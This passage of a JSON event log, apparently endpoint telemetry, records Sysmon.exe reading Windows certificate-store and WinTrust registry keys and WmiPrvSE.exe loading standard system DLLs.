"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cryptsp.dll", - "image_path": "C:\\Windows\\System32\\cryptsp.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479790000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479790000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "wkscli.dll", - "image_path": "C:\\Windows\\System32\\wkscli.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479950016, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "cscapi.dll", - "image_path": "C:\\Windows\\System32\\cscapi.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479950016, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479950016, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "msdtcuiu.dll", - "image_path": "C:\\Windows\\System32\\msdtcuiu.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479480000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "browcli.dll", - "image_path": "C:\\Windows\\System32\\browcli.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479950016, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "atl.dll", - "image_path": "C:\\Windows\\System32\\atl.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "msdtcprx.dll", - "image_path": "C:\\Windows\\System32\\msdtcprx.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "mtxclu.dll", - "image_path": "C:\\Windows\\System32\\mtxclu.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479790000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "winspool.drv", - "image_path": "C:\\Windows\\System32\\winspool.drv", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480259984, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573480420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 